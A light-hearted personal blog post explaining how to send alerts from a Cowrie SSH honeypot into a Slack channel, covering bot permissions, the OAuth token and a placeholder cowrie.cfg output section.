I found myself with a rare 30mins this evening to twiddle my thumbs (between making pasta bake for the family and time to be reading bedtime stories), and attempted to tick a random task off my to-do list. As you may have guessed from the title, feeding activity from a Cowrie SSH honeypot into Slack.
Warnings first; whilst you can achieve the same end-goal, my experience suggests you may also come to regret it – consider yourselves warned….
Still here? Don’t say I didn’t warn you…
Components
As you might have guessed, we need:
* Cowrie Honeypot
* Slack Channel
* Slack Bot
* Not enough sense to heed my warning above…
Slack Channel
I’ll assume you already have a Slack Workspace in mind for the integration, setting this up is outside the scope of this write-up, I’ll leave that as an exercise for the reader. Once you’re ready choose an existing channel, or (preferably) create a dedicated channel.
With that selected, make a note of the Channel ID from the About tab on settings:
Slack Bot
Next up, we need a Bot for integration. I’m far from a Slack specialists, so I’ll admit to get started I simply typed bot into the menu bar, and chose the helpful looking “Create a bot for your workspace” feature shown below.
From here I needed to set two components:
Slack Bot – OAuth Permissions
Admittedly this took me some trial and error, the Cowrie documentation for this feature isn’t the most verbose (or I failed to locate between oven alarms to deal with the next step for pasta bake); but eventually providing the permission of chat:write.public got the integration working.
Slack Bot – OAuth Token
Once permissions are set, and from the same page, finally install the token to your workspace and accept the integration when prompted; copying the resultant Token ID for the final step.
Cowrie Honeypot
If you’re this far, I’m going to assume you already have a functional Cowrie installation. If not, I can help with either a quick and dirty build script or a more mature (but still WIP) Terraform IaC deployment. Once running the configuration settings are in the main {cowrie-install-path}/etc/cowrie.cfg file, something like the below.
[output_slack]
enabled = true
channel = <CHANNEL_ID>
token = <BOT_TOKEN>
debug = false
And with that, a quick bin/cowrie stop & bin/cowrie start to reload, and you should be good.
But remember, just because you can do something, doesn’t mean it’s necessarily a good idea. Even Slack itself get’s sick of the notifications in short order. I take no responsibility for wearing out either your speakers or your sanity, ‘ere be digital dragons…..
—
Andrew